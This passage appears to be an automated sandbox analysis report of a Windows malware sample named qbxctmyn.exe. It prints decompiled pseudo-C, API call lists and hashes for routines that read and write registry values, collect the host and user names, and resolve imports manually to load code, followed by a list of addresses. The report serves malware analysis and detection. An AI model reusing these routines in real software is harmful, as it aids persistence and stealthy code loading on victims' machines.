                                                                                						_t35 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
                                                                                						_t68 = _t65 + 0x14;
                                                                                						if(RegOpenKeyExA(0x80000001, _t35, 0, 0x101,  &_v12) != 0) {
                                                                                							L19:
                                                                                							E0040EE2A(_t56, 0x4122f8, 0, 0x100);
                                                                                							_t65 = _t68 + 0xc;
                                                                                							goto L20;
                                                                                						}
                                                                                						if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, 0,  &_v8) != 0 || _v16 != 1 || _v8 <= 0) {
                                                                                							L15:
                                                                                							_t42 =  *0x412c3c; // 0x0
                                                                                							if(_t42 == 0) {
                                                                                								goto L18;
                                                                                							}
                                                                                							E0040EC2E(_t42);
                                                                                							 *0x412c3c = 0;
                                                                                							goto L17;
                                                                                						} else {
                                                                                							_t45 = E0040EBCC(_v8);
                                                                                							_pop(_t56);
                                                                                							 *0x412c3c = _t45;
                                                                                							if(_t45 == 0) {
                                                                                								L18:
                                                                                								RegCloseKey(_v12);
                                                                                								goto L19;
                                                                                							}
                                                                                							_t56 =  &_v8;
                                                                                							if(RegQueryValueExA(_v12,  &_v312, 0,  &_v16, _t45,  &_v8) != 0) {
                                                                                								goto L15;
                                                                                							}
                                                                                							_t49 =  &_v312;
                                                                                							_t60 = _t49 + 1;
                                                                                							do {
                                                                                								_t57 =  *_t49;
                                                                                								_t49 = _t49 + 1;
                                                                                							} while (_t57 != 0);
                                                                                							_t52 = E0040EBCC(_t49 - _t60 + 1);
                                                                                							_pop(_t56);
                                                                                							 *0x412c38 = _t52;
                                                                                							if(_t52 == 0) {
                                                                                								goto L18;
                                                                                							}
                                                                                							E0040EF00(_t52,  &_v312);
                                                                                							L17:
                                                                                							_pop(_t56);
                                                                                							goto L18;
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					E00407EE6(_t56);
                                                                                					L20:
                                                                                					_t70 = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // 0x43
                                                                                					if(_t70 != 0) {
                                                                                						_t71 =  *0x4121a4; // 0x0
                                                                                						if(_t71 == 0) {
                                                                                							_t31 = E0040675C("C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe",  &_v20, 0);
                                                                                							_t61 = _t31;
                                                                                							if(_t31 != 0) {
                                                                                								_t63 = _v20;
                                                                                								 *0x4122d4 = E004024C2(_t61, _t63, 0);
                                                                                								 *0x4121a4 = _t63;
                                                                                								E0040EC2E(_t61);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					return 1;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 0040815F
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 00408187
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000001,00000000,0040A45F,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 004081BE
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?,?,?,?,74CB43E0,00000000), ref: 00408210
                                                                                  • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000080,?,74CB43E0,00000000), ref: 0040677E
                                                                                  • Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,74CB43E0,00000000), ref: 0040679A
                                                                                  • Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,74CB43E0,00000000), ref: 004067B0
                                                                                  • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000002,?,74CB43E0,00000000), ref: 004067BF
                                                                                  • Part of subcall function 0040675C: GetFileSize.KERNEL32(000000FF,00000000,?,74CB43E0,00000000), ref: 004067D3
                                                                                  • Part of subcall function 0040675C: ReadFile.KERNEL32(000000FF,?,00000040,00408244,00000000,?,74CB43E0,00000000), ref: 00406807
                                                                                  • Part of subcall function 0040675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0040681F
                                                                                  • Part of subcall function 0040675C: ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,74CB43E0,00000000), ref: 0040683E
                                                                                  • Part of subcall function 0040675C: SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0040685C
                                                                                  • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                  • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
                                                                                • String ID: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe
                                                                                • API String ID: 124786226-2070294517
                                                                                • Opcode ID: 3deeb1ea8207cc87c011d2a4d6b1370e46491988774d06f984d994a05b286973
                                                                                • Instruction ID: c6ff5cc28a73505882571aaa3479db7aabb841166acb9389a4089cab67cb233b
                                                                                • Opcode Fuzzy Hash: 3deeb1ea8207cc87c011d2a4d6b1370e46491988774d06f984d994a05b286973
                                                                                • Instruction Fuzzy Hash: 6641A2B1801109BFEB10EBA19E81DEF777CDB04304F1448BFF545F2182EAB85A948B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegCreateKeyExA.ADVAPI32(80000001,00E3E50A,00000000,00000000,00000000,00020106,00000000,00E3E50A,00000000,000000E4), ref: 00E3E319
                                                                                • RegSetValueExA.ADVAPI32(00E3E50A,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,004122F8), ref: 00E3E38E
                                                                                • RegDeleteValueA.ADVAPI32(00E3E50A,?,?,?,?,?,000000C8,004122F8,?,?,?,?,?,?,?,D), ref: 00E3E3BF
                                                                                • RegCloseKey.ADVAPI32(00E3E50A,?,?,?,?,000000C8,004122F8,?,?,?,?,?,?,?,D,00E3E50A), ref: 00E3E3C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Value$CloseCreateDelete
                                                                                • String ID: D
                                                                                • API String ID: 2667537340-185221428
                                                                                • Opcode ID: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
                                                                                • Instruction ID: 3ff6d8f2fc2ae45b03cbad79b1982d6135ec076f6080536e265c101d53fe6843
                                                                                • Opcode Fuzzy Hash: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
                                                                                • Instruction Fuzzy Hash: 18213C71A0021DBBDF209FA5EC89EEF7FB9EF08754F048061F904E6151E6719A54DBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 00E371E1
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00E37228
                                                                                • LocalFree.KERNEL32(?,?,?), ref: 00E37286
                                                                                • wsprintfA.USER32 ref: 00E3729D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Name$AccountFreeLocalLookupUserwsprintf
                                                                                • String ID: |
                                                                                • API String ID: 2539190677-2343686810
                                                                                • Opcode ID: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
                                                                                • Instruction ID: a8c788cf5b230ffa42899883ba21c2275f732d7d239d3db5154977f59038a929
                                                                                • Opcode Fuzzy Hash: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
                                                                                • Instruction Fuzzy Hash: 65313AB2904208BBCB11DFA8DC49ADA7FFCEF04314F148066F859EB111EA75DA48CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040AD08(CHAR* _a4) {
                                                                                				char _v132;
                                                                                				int _t9;
                                                                                				char _t11;
                                                                                				intOrPtr* _t12;
                                                                                				CHAR* _t13;
                                                                                				CHAR* _t14;
                                                                                
                                                                                				_t9 = gethostname( &_v132, 0x80);
                                                                                				if(_t9 != 0) {
                                                                                					_t14 = _a4;
                                                                                					L15:
                                                                                					if( *_t14 != 0) {
                                                                                						return _t9;
                                                                                					}
                                                                                					return lstrcpyA(_t14, "LocalHost");
                                                                                				}
                                                                                				_t13 = _a4;
                                                                                				_t11 = _v132;
                                                                                				_t12 =  &_v132;
                                                                                				_t14 = _t13;
                                                                                				while(_t11 != 0) {
                                                                                					if(_t11 < 0x61 || _t11 > 0x7a) {
                                                                                						if(_t11 < 0x41 || _t11 > 0x5a) {
                                                                                							if(_t11 < 0x30 || _t11 > 0x39) {
                                                                                								if(_t11 != 0x2e) {
                                                                                									goto L10;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						goto L9;
                                                                                					} else {
                                                                                						L9:
                                                                                						 *_t13 = _t11;
                                                                                						_t13 =  &(_t13[1]);
                                                                                						L10:
                                                                                						_t12 = _t12 + 1;
                                                                                						_t11 =  *_t12;
                                                                                						continue;
                                                                                					}
                                                                                				}
                                                                                				_t9 = lstrlenA(_t14);
                                                                                				if(_t14[_t9] == 0x2e) {
                                                                                					_t9 = lstrlenA(_t14);
                                                                                					_t14[_t9] = 0;
                                                                                				}
                                                                                				goto L15;
                                                                                			}

                                                                                APIs
                                                                                • gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                • lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$gethostnamelstrcpy
                                                                                • String ID: LocalHost
                                                                                • API String ID: 3695455745-3154191806
                                                                                • Opcode ID: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                • Instruction ID: 5e983dddb47fd7e780230f110e9d304ee880480ae48faa8370a3fb9af9ed59c3
                                                                                • Opcode Fuzzy Hash: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                • Instruction Fuzzy Hash: FA0149208443895EDF3107289844BEA3F675F9670AF104077E4C0BB692E77C8893835F
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040E3CA(void* __edx, void* _a4, char* _a8, intOrPtr* _a12) {
                                                                                				int* _v8;
                                                                                				int _v12;
                                                                                				void* _v16;
                                                                                				intOrPtr _v20;
                                                                                				int _v24;
                                                                                				int _v28;
                                                                                				int _v32;
                                                                                				int* _v36;
                                                                                				char _v68;
                                                                                				intOrPtr* _t52;
                                                                                				int _t69;
                                                                                				intOrPtr _t75;
                                                                                				int _t78;
                                                                                				intOrPtr _t80;
                                                                                				void* _t82;
                                                                                				void* _t84;
                                                                                				void* _t85;
                                                                                				int _t89;
                                                                                				void* _t91;
                                                                                				void* _t92;
                                                                                				void* _t93;
                                                                                
                                                                                				_t82 = __edx;
                                                                                				_v36 = 0;
                                                                                				if(RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v16) != 0) {
                                                                                					L16:
                                                                                					return _v36;
                                                                                				}
                                                                                				_t52 = _a12;
                                                                                				_t89 = 0;
                                                                                				_t6 = _t52 + 1; // 0x4128f9
                                                                                				_t84 = _t6;
                                                                                				do {
                                                                                					_t80 =  *_t52;
                                                                                					_t52 = _t52 + 1;
                                                                                				} while (_t80 != 0);
                                                                                				_t85 = _t52 - _t84;
                                                                                				_v8 = 0;
                                                                                				if(_t85 > 0x1c) {
                                                                                					_t85 = 0x1c;
                                                                                				}
                                                                                				E0040EE08( &_v68, _a12, _t85);
                                                                                				_t56 = _t91 + _t85 - 0x40;
                                                                                				_v12 = 0;
                                                                                				_v20 = _t91 + _t85 - 0x40;
                                                                                				E0040F1ED(0, _t56, 0xa);
                                                                                				_t93 = _t92 + 0x18;
                                                                                				if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) != 0) {
                                                                                					L15:
                                                                                					RegCloseKey(_v16);
                                                                                					goto L16;
                                                                                				} else {
                                                                                					do {
                                                                                						_t89 = _t89 + _v12;
                                                                                						_v8 = _v8 + 1;
                                                                                						_v12 = 0;
                                                                                						E0040F1ED(_v8, _v20, 0xa);
                                                                                						_t93 = _t93 + 0xc;
                                                                                					} while (RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) == 0);
                                                                                					if(_t89 <= 0) {
                                                                                						goto L15;
                                                                                					}
                                                                                					_v32 = _t89;
                                                                                					E0040DB2E(_t89);
                                                                                					_t69 =  *0x4136c4; // 0x0
                                                                                					if(_t69 == 0) {
                                                                                						goto L15;
                                                                                					}
                                                                                					_v12 = _t69;
                                                                                					_v8 = 0;
                                                                                					while(1) {
                                                                                						_v28 = _t89;
                                                                                						E0040F1ED(_v8, _v20, 0xa);
                                                                                						_t93 = _t93 + 0xc;
                                                                                						if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, _v12,  &_v28) != 0) {
                                                                                							break;
                                                                                						}
                                                                                						_t78 = _v28;
                                                                                						if(_t78 == 0) {
                                                                                							break;
                                                                                						}
                                                                                						_v12 =  &(_v12[_t78]);
                                                                                						_t89 = _t89 - _t78;
                                                                                						_v8 = _v8 + 1;
                                                                                						if(_t89 > 0) {
                                                                                							continue;
                                                                                						}
                                                                                						break;
                                                                                					}
                                                                                					_t106 = _t89;
                                                                                					if(_t89 == 0) {
                                                                                						_t75 =  *0x4136c4; // 0x0
                                                                                						E00402544(_t75, _t75, _v32, 0xe4, 0xc8);
                                                                                						E0040E332(_t82, _t106,  *0x4136c4, _v32);
                                                                                						_v36 = 1;
                                                                                					}
                                                                                					goto L15;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,0040E5F2,00000000,00020119,0040E5F2,004122F8), ref: 0040E3E6
                                                                                • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0040E44E
                                                                                • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0040E482
                                                                                • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,80000001,?), ref: 0040E4CF
                                                                                • RegCloseKey.ADVAPI32(0040E5F2,?,?,?,?,000000C8,000000E4), ref: 0040E520
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: QueryValue$CloseOpen
                                                                                • String ID:
                                                                                • API String ID: 1586453840-0
                                                                                • Opcode ID: aa9c7803f1892efbeb2ec60484cf553e29528730025646744f8bae12e973cd09
                                                                                • Instruction ID: f21eb42f94b351107ce6bcf9928d909f9cde6c0f887f3b022360bbb50f243882
                                                                                • Opcode Fuzzy Hash: aa9c7803f1892efbeb2ec60484cf553e29528730025646744f8bae12e973cd09
                                                                                • Instruction Fuzzy Hash: D94106B2D00219BFDF119FD5DC81DEEBBB9EB08308F14487AE910B2291E3359A559B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 00E3B51A
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E3B529
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E3B548
                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 00E3B590
                                                                                • wsprintfA.USER32 ref: 00E3B61E
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$File$Local$InformationSystemZonewsprintf
                                                                                • String ID:
                                                                                • API String ID: 4026320513-0
                                                                                • Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                • Instruction ID: 8aa93a9cc2750e555fe67b52dc4b4a2c9ee464e490911d9cb2a1bd2927c44ac1
                                                                                • Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                • Instruction Fuzzy Hash: 345100B1D0021DAACF14DFD5D8895EEBBB9BF48304F10816AF605B6150E7B94AC9CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00404280(void* __ecx, intOrPtr _a4) {
                                                                                				void* _v8;
                                                                                				unsigned int _v12;
                                                                                				unsigned int _v16;
                                                                                				void* _v20;
                                                                                				intOrPtr _v24;
                                                                                				char _v28;
                                                                                				signed int _t35;
                                                                                				signed int _t38;
                                                                                				signed int _t40;
                                                                                				void* _t67;
                                                                                				void* _t68;
                                                                                				void* _t73;
                                                                                				intOrPtr* _t74;
                                                                                
                                                                                				_t68 = __ecx;
                                                                                				_t35 = CreateEventA(0, 1, 1, 0);
                                                                                				_v8 = _t35;
                                                                                				if(_t35 != 0) {
                                                                                					_t38 = E00404000(E00403ECD(_t68),  &_v20);
                                                                                					if(_t38 == 0) {
                                                                                						L11:
                                                                                						_t40 = CloseHandle(_v8) | 0xffffffff;
                                                                                						L12:
                                                                                						return _t40;
                                                                                					}
                                                                                					_t67 = _v20;
                                                                                					_t40 = _t38 | 0xffffffff;
                                                                                					if(_t67 == _t40) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_v16 = E0040ECA5();
                                                                                					E00403F18(_t67,  &_v16, 4, _v8, 0x7d0);
                                                                                					if(E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0) == 0 || _v12 != (_v16 >> 2) + _v16) {
                                                                                						CloseHandle(_t67);
                                                                                						goto L11;
                                                                                					} else {
                                                                                						_v12 = _v12 + (_v12 >> 2);
                                                                                						E00403F18(_t67,  &_v12, 4, _v8, 0x7d0);
                                                                                						_v28 = 1;
                                                                                						_t73 = 0xc;
                                                                                						_v24 = 1;
                                                                                						E00403F18(_t67,  &_v28, 8, _v8, 0x7d0);
                                                                                						_t74 = E0040EBCC(_t73);
                                                                                						 *_t74 = 0x61;
                                                                                						 *((intOrPtr*)(_t74 + 4)) = 2;
                                                                                						if(_a4 != 0) {
                                                                                							 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
                                                                                							 *0x41215a =  *0x41215a + 1;
                                                                                						} else {
                                                                                							 *(_t74 + 8) = 1;
                                                                                						}
                                                                                						E00403F18(_t67, _t74, _v24, _v8, 0x7d0);
                                                                                						E0040EC2E(_t74);
                                                                                						E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0);
                                                                                						CloseHandle(_v8);
                                                                                						CloseHandle(_t67);
                                                                                						_t40 = 0 | _a4 == 0x00000000;
                                                                                						goto L12;
                                                                                					}
                                                                                				}
                                                                                				return _t35 | 0xffffffff;
                                                                                			}

                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404290
                                                                                • CloseHandle.KERNEL32(0040A3C7), ref: 004043AB
                                                                                • CloseHandle.KERNEL32(00000001), ref: 004043AE
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$CreateEvent
                                                                                • String ID:
                                                                                • API String ID: 1371578007-0
                                                                                • Opcode ID: 1ca6cf8784600e63233360972df8e8f73f6c7624b12c89556f18688b41653a7a
                                                                                • Instruction ID: 96190e95dfac0256a72039fb05246d043f10f1ed4b28fe2ef93a25e2cd6a7057
                                                                                • Opcode Fuzzy Hash: 1ca6cf8784600e63233360972df8e8f73f6c7624b12c89556f18688b41653a7a
                                                                                • Instruction Fuzzy Hash: D94181B1900209BADB109BA2CD45FDFBFBCEF40355F104566F604B21C1D7789A51DBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 00E36303
                                                                                • LoadLibraryA.KERNEL32(?), ref: 00E3632A
                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00E363B1
                                                                                • IsBadHugeReadPtr.KERNEL32(-000000DC,00000014), ref: 00E36405
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HugeRead$AddressLibraryLoadProc
                                                                                • String ID:
                                                                                • API String ID: 3498078134-0
                                                                                • Opcode ID: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
                                                                                • Instruction ID: eb5918cef2f9c6686a5f5e5db8bac43ae760f8d67e54d3a57cd08f2332a1441d
                                                                                • Opcode Fuzzy Hash: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
                                                                                • Instruction Fuzzy Hash: F3414C71A00205FBDB14CF68C888BA9BBB4FF44358F24D169E956E7290D771ED40CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00406069(_Unknown_base(*)()* _a4) {
                                                                                				intOrPtr* _v8;
                                                                                				signed int _v12;
                                                                                				struct HINSTANCE__* _v16;
                                                                                				intOrPtr _t47;
                                                                                				_Unknown_base(*)()* _t48;
                                                                                				_Unknown_base(*)()* _t50;
                                                                                				struct HINSTANCE__* _t52;
                                                                                				_Unknown_base(*)()* _t53;
                                                                                				_Unknown_base(*)()* _t54;
                                                                                				_Unknown_base(*)()* _t55;
                                                                                				signed int _t56;
                                                                                				_Unknown_base(*)()* _t59;
                                                                                				_Unknown_base(*)()* _t62;
                                                                                				_Unknown_base(*)()* _t63;
                                                                                				intOrPtr _t69;
                                                                                				_Unknown_base(*)()* _t76;
                                                                                				_Unknown_base(*)()* _t77;
                                                                                				intOrPtr* _t82;
                                                                                				void* _t85;
                                                                                				intOrPtr* _t87;
                                                                                				_Unknown_base(*)()* _t89;
                                                                                
                                                                                				_t82 = _a4;
                                                                                				_t47 =  *_t82;
                                                                                				_t3 = _t82 + 4; // 0x65e85621
                                                                                				_t69 =  *_t3;
                                                                                				_v12 = 1;
                                                                                				if( *((intOrPtr*)(_t47 + 0x84)) != 0) {
                                                                                					_t85 =  *((intOrPtr*)(_t47 + 0x80)) + _t69;
                                                                                					_t48 = IsBadReadPtr(_t85, 0x14);
                                                                                					__eflags = _t48;
                                                                                					if(_t48 != 0) {
                                                                                						L29:
                                                                                						return _v12;
                                                                                					}
                                                                                					_t87 = _t85 + 0x10;
                                                                                					_v8 = _t87;
                                                                                					while(1) {
                                                                                						_t50 =  *(_t87 - 4);
                                                                                						__eflags = _t50;
                                                                                						if(_t50 == 0) {
                                                                                							goto L29;
                                                                                						}
                                                                                						_t52 = LoadLibraryA(_t50 + _t69);
                                                                                						_v16 = _t52;
                                                                                						__eflags = _t52 - 0xffffffff;
                                                                                						if(_t52 == 0xffffffff) {
                                                                                							L28:
                                                                                							_t44 =  &_v12;
                                                                                							 *_t44 = _v12 & 0x00000000;
                                                                                							__eflags =  *_t44;
                                                                                							goto L29;
                                                                                						}
                                                                                						_t10 = _t82 + 8; // 0x8bfffffa
                                                                                						_t53 =  *_t10;
                                                                                						__eflags = _t53;
                                                                                						if(_t53 != 0) {
                                                                                							_t14 = _t82 + 0xc; // 0x28408b06
                                                                                							_t54 = E0040EBED(_t53, 4 +  *_t14 * 4);
                                                                                						} else {
                                                                                							_t11 = _t82 + 0xc; // 0x28408b06
                                                                                							_t54 = E0040EBCC(4 +  *_t11 * 4);
                                                                                						}
                                                                                						 *(_t82 + 8) = _t54;
                                                                                						__eflags = _t54;
                                                                                						if(_t54 == 0) {
                                                                                							goto L28;
                                                                                						} else {
                                                                                							_t18 = _t82 + 0xc; // 0x28408b06
                                                                                							 *((intOrPtr*)(_t54 +  *_t18 * 4)) = _v16;
                                                                                							 *(_t82 + 0xc) =  *(_t82 + 0xc) + 1;
                                                                                							_t55 =  *(_t87 - 0x10);
                                                                                							__eflags = _t55;
                                                                                							if(_t55 == 0) {
                                                                                								_t89 =  *_t87 + _t69;
                                                                                								__eflags = _t89;
                                                                                								_t76 = _t89;
                                                                                							} else {
                                                                                								_t89 = _t55 + _t69;
                                                                                								_t76 =  *_v8 + _t69;
                                                                                							}
                                                                                							_t56 =  *_t89;
                                                                                							__eflags = _t56;
                                                                                							if(_t56 == 0) {
                                                                                								L25:
                                                                                								__eflags = _v12;
                                                                                								if(_v12 == 0) {
                                                                                									goto L29;
                                                                                								}
                                                                                								_v8 = _v8 + 0x14;
                                                                                								_t59 = IsBadReadPtr(_v8 + 0xfffffff0, 0x14);
                                                                                								__eflags = _t59;
                                                                                								if(_t59 == 0) {
                                                                                									_t87 = _v8;
                                                                                									continue;
                                                                                								}
                                                                                								goto L29;
                                                                                							} else {
                                                                                								_a4 = _t76;
                                                                                								_a4 = _a4 - _t89;
                                                                                								__eflags = _t56;
                                                                                								do {
                                                                                									if(__eflags >= 0) {
                                                                                										_t62 = GetProcAddress(_v16, _t56 + _t69 + 2);
                                                                                										__eflags = _t62;
                                                                                										if(_t62 == 0) {
                                                                                											L21:
                                                                                											_t63 = _a4;
                                                                                											__eflags =  *(_t63 + _t89);
                                                                                											if( *(_t63 + _t89) == 0) {
                                                                                												_t38 =  &_v12;
                                                                                												 *_t38 = _v12 & 0x00000000;
                                                                                												__eflags =  *_t38;
                                                                                												goto L25;
                                                                                											}
                                                                                											goto L22;
                                                                                										}
                                                                                										_t77 = _a4;
                                                                                										__eflags = _t62 -  *(_t77 + _t89);
                                                                                										if(_t62 ==  *(_t77 + _t89)) {
                                                                                											goto L21;
                                                                                										}
                                                                                										L20:
                                                                                										 *(_t77 + _t89) = _t62;
                                                                                										goto L21;
                                                                                									}
                                                                                									_t62 = GetProcAddress(_v16, _t56 & 0x0000ffff);
                                                                                									_t77 = _a4;
                                                                                									goto L20;
                                                                                									L22:
                                                                                									_t89 = _t89 + 4;
                                                                                									_t56 =  *_t89;
                                                                                									__eflags = _t56;
                                                                                								} while (__eflags != 0);
                                                                                								goto L25;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					goto L29;
                                                                                				}
                                                                                				return 1;
                                                                                			}

                                                                                0x00406071
                                                                                0x00406074
                                                                                0x0040607c
                                                                                0x0040607c
                                                                                0x00406082
                                                                                0x00406087
                                                                                0x00406099
                                                                                0x0040609c
                                                                                0x004060a2
                                                                                0x004060a4
                                                                                0x004061b2
                                                                                0x00000000
                                                                                0x004061b5
                                                                                0x004060aa
                                                                                0x004060ad
                                                                                0x004060b5
                                                                                0x004060b5
                                                                                0x004060b8
                                                                                0x004060ba
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004060c3
                                                                                0x004060c9
                                                                                0x004060cc
                                                                                0x004060cf
                                                                                0x004061ae
                                                                                0x004061ae
                                                                                0x004061ae
                                                                                0x004061ae
                                                                                0x00000000
                                                                                0x004061ae
                                                                                0x004060d5
                                                                                0x004060d5
                                                                                0x004060d8
                                                                                0x004060da
                                                                                0x004060ee
                                                                                0x004060fa
                                                                                0x004060dc
                                                                                0x004060dc
                                                                                0x004060e7
                                                                                0x004060e7
                                                                                0x00406101
                                                                                0x00406104
                                                                                0x00406106
                                                                                0x00000000
                                                                                0x0040610c
                                                                                0x0040610c
                                                                                0x00406112
                                                                                0x00406115
                                                                                0x00406118
                                                                                0x0040611b
                                                                                0x0040611d
                                                                                0x0040612d
                                                                                0x0040612d
                                                                                0x0040612f
                                                                                0x0040611f
